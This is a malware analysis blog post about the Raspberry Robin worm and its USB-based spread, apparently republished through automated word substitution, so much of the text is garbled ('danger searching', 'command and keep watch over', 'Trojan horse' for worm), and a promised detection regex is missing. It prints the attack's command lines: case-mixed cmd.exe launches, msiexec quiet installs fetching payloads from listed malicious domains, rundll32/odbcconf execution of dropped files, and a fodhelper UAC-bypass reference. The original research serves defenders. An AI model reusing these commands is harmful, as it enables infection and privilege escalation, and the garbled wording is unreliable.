Tuesday, December 13, 2022
HomeHealthRaspberry Robin: Extremely Evasive Trojan horse Spreads over Exterior Disks

Raspberry Robin: Extremely Evasive Trojan horse Spreads over Exterior Disks


Throughout our danger searching workouts in contemporary months, we’ve began to watch a distinguishing development of msiexec.exe utilization throughout other endpoints. As we drilled all the way down to particular person belongings, we discovered lines of a lately found out malware referred to as Raspberry Robin. The RedCanary Analysis Group first coined the identify for this malware of their weblog submit, and Sekoia printed a Flash Record concerning the task underneath the identify of QNAP Trojan horse. Each articles be offering nice research of the malware’s habits. Our findings fortify and enrich prior analysis at the subject.

Execution Chain

Raspberry Robin is a bug that spreads over an exterior power. After preliminary an infection, it downloads its payload thru msiexec.exe from QNAP cloud accounts, executes its code thru rundll32.exe, and establishes a command and keep watch over (C2) channel thru TOR connections.

Symbol 1: Execution chain of Raspberry Robin

Let’s walkthrough the stairs of the kill-chain to look how this malware purposes.

Supply and Exploitation

Raspberry Robin is delivered thru inflamed exterior disks. As soon as hooked up, cmd.exe tries to execute instructions from a report inside that disk. This report is both a .lnk report or a report with a particular naming development. Recordsdata with this development show off a 2 to five persona identify with an generally difficult to understand extension, together with .swy, .chk, .ico, .usb, .xml, and .cfg. Additionally, the attacker makes use of a substantial amount of whitespace/non printable characters and converting letter case to keep away from string matching detection ways. Instance command strains come with:

  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /R C:WINDOWSsystem32cmd.exe<Gne.Swy

Report pattern for supply can also be discovered on this URL:
https://www.virustotal.com/gui/report/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/family members

Subsequent, we apply explorer.exe working with an difficult to understand command line argument, spawned through a prior example of cmd.exe. This difficult to understand argument turns out to take the identify of an inflamed exterior power or .lnk report that used to be in the past completed. Probably the most samples had values together with USB, USB DISK, or USB Pressure, whilst another samples had extra explicit names. On each and every example of explorer.exe we see that the adversary is converting the letter case to keep away from detection:

  • ExPLORer [redacted]
  • exploREr [redacted]
  • ExplORER USB Pressure
  • eXplorer USB DISK

Set up

After supply and preliminary execution, cmd.exe spawns msiexec.exe to obtain the Raspberry Robin payload. It makes use of -q or /q at the side of same old set up parameter to function quietly. As soon as once more, blended case letters are used to avoid detection:

  • mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
  • mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
  • MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
  • mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
  • msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
  • MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you’ll be able to see above, URLs used for payload obtain have a particular development. Domain names use 2 to 4 persona names with difficult to understand TLDs together with .xyz, .hk, .information, .pw, .cx, .me, and extra. URL paths have a unmarried listing with a random string 11 characters lengthy, adopted through hostname and the username of the sufferer. On community telemetry, we additionally noticed the Home windows Installer person agent because of using msiexec.exe. To discover Raspberry Robin thru its URL development, use this regex:


If we glance up the WHOIS knowledge for given domain names, we see area registration dates going way back to February 2015. We additionally see an build up on registered domain names ranging from September 2021, which aligns with preliminary observations of Raspberry Robin through our friends.

WHOIS Introduction Date Depend
12/9/2015 1
10/8/2020 1
11/14/2020 1
7/3/2021 1
7/26/2021 2
9/11/2021 2
9/23/2021 9
9/24/2021 6
9/26/2021 4
9/27/2021 2
11/9/2021 3
11/10/2021 1
11/18/2021 2
11/21/2021 3
12/11/2021 7
12/31/2021 7
1/17/2022 6
1/30/2022 11
1/31/2022 3
4/17/2022 5

Desk 1: Distribution of area advent dates over the years


Related domain names have SSL certificate with the topic selection identify of q74243532.myqnapcloud.com, which issues out the underlying QNAP cloud infra. Additionally, their URL scan effects go back login pages to QTS provider of QNAP:

Symbol 2: QNAP QTS login web page from related domain names

As soon as the payload is downloaded, it’s completed thru quite a lot of device binaries. First, rundll32.exe makes use of the ShellExec_RunDLL serve as from shell32.dll to leverage device binaries reminiscent of msiexec.exe, odbcconf.exe, or keep watch over.exe. Those binaries are used to execute the payload saved in C:ProgramData[3 chars]

  • C:WINDOWSsystem32rundll32.exe shell32.dll ShellExec_RunDLL C:WINDOWSsyswow64MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:ProgramDataAzuwnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
  • C:Windowssystem32RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:Windowssyswow64odbcconf.exe -s -C -a {regsvr C:ProgramDataTvbzhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
  • exe SHELL32,ShellExec_RunDLLA C:WINDOWSsyswow64odbcconf -E /c /C -a {regsvr C:ProgramDataEuoikdvnbb.xml.}
  • C:WINDOWSsystem32rundll32.exe SHELL32,ShellExec_RunDLL C:WINDOWSsyswow64CONTROL.EXE C:ProgramDataLzmqkuiht.lkg.

It’s adopted through the execution of fodhelper.exe, which has the automobile increased bit set to true. It’s frequently leveraged through adversaries with the intention to bypass Person Account Regulate and execute further instructions with escalated privileges [3]. To watch suspicious executions of fodhelper.exe, we advise tracking its circumstances with none command line arguments.

Command and Regulate

Raspberry Robin units up its C2 channel thru the extra execution of device binaries with none command line argument, which is slightly ordinary. That most probably issues to procedure injection given increased privileges in earlier steps of execution. It makes use of dllhost.exe, rundll32.exe, and regsvr32.exe to arrange a TOR connection.

Detection thru International Risk Indicators

In Cisco International Risk Indicators to be had thru Cisco Protected Community Analytics and Cisco Protected Endpoint, we observe this task underneath the Raspberry Robin danger object. Symbol 3 displays a detection pattern of Raspberry Robin:

Symbol 3: Raspberry Robin detection pattern in Cisco International Risk Indicators


Raspberry Robin tries to stay undetected thru its use of device binaries, blended letter case, TOR-based C2, and abuse of compromised QNAP accounts. Even if we have now an identical intelligence gaps (the way it infects exterior disks, what are its movements on function) like our friends, we’re steadily gazing its actions.

Signs of Compromise

Sort Level IOC
Area Payload Supply k6j[.]pw
Area Payload Supply kjaj[.]best
Area Payload Supply v0[.]cx
Area Payload Supply zk4[.]me
Area Payload Supply zk5[.]co
Area Payload Supply 0dz[.]me
Area Payload Supply 0e[.]si
Area Payload Supply 5qw[.]pw
Area Payload Supply 6w[.]re
Area Payload Supply 6xj[.]xyz
Area Payload Supply aij[.]hk
Area Payload Supply b9[.]pm
Area Payload Supply glnj[.]nl
Area Payload Supply j4r[.]xyz
Area Payload Supply j68[.]information
Area Payload Supply j8[.]si
Area Payload Supply jjl[.]one
Area Payload Supply jzm[.]pw
Area Payload Supply k6c[.]org
Area Payload Supply kj1[.]xyz
Area Payload Supply kr4[.]xyz
Area Payload Supply l9b[.]org
Area Payload Supply lwip[.]re
Area Payload Supply mzjc[.]is
Area Payload Supply nt3[.]xyz
Area Payload Supply qmpo[.]artwork
Area Payload Supply tiua[.]united kingdom
Area Payload Supply vn6[.]co
Area Payload Supply z7s[.]org
Area Payload Supply k5x[.]xyz
Area Payload Supply 6Y[.]rE
Area Payload Supply doem[.]Re
Area Payload Supply bpyo[.]IN
Area Payload Supply l5k[.]xYZ
Area Payload Supply uQW[.]fUTbOL
Area Payload Supply t7[.]Nz
Area Payload Supply 0t[.]yT


  1. Raspberry Robin will get the bug early – https://redcanary.com/weblog/raspberry-robin/
  2. QNAP bug: who advantages from crime? – https://7095517.fs1.hubspotusercontent-na1.web/hubfs/7095517/FLINTpercent202022-016percent20-%20QNAPpercent20worm_percent20whopercent20benefitspercent20frompercent20crimepercent20(1).pdf
  3. UAC Bypass – Fodhelper – https://pentestlab.weblog/2017/06/07/uac-bypass-fodhelper/



Most Popular

Recent Comments